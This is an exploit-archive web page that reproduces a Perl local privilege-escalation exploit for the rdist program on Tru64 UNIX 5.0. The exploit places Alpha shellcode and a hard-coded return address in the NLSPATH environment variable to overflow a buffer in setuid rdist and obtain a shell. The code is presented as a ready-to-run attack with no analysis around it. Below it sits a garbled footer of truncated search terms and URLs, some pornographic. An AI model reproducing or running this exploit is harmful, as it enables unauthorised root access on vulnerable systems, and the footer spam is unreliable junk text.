about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit




2006-03-30 Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit
Rated as : High Risk

#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com

$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

print "Shellcode is " . length($sc) . " bytes long
\n";

$tlen = (1024-(length($sc)))/4;

$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910)
(TruNastyWhore.localdomain) 
$ret = "\x9a\x01\x01\x40\x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc
. $ret;
exec("/usr/bin/rdist -c DMr0x");
securitydot.net - 2006-03-30

Advertising

Copyright 2007, SecurityDot
Fri, 11 Dec 2009 08:58:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.opense nayanthara www.zqlz.c 17 to 18 g www.myunit free sexy www.youlun www.cdyzcm Mallu hot chamdi www.youlun indiancall Vanessa Rz www.dian10 frontpage www.mysund telugu dia sexy india www.cd530. www.lexsen phpbb2 pas 168.3g600. nayanthara Wap Phoner www.lexsen nayanthara Www.Sexfre www.myshw. google www.Arab6. www.66190. viewscreen IBM AIX 4. 1373 PHP+Nuke+E www.72by.c s+e+x+g+i+ www.mysdit Bhabi chod OpenSSH 4. 200 /compo Crack Data www.myruzh inject tin WW.Pink wo reema sen www.sfkk.n www.pornor 123mallu.c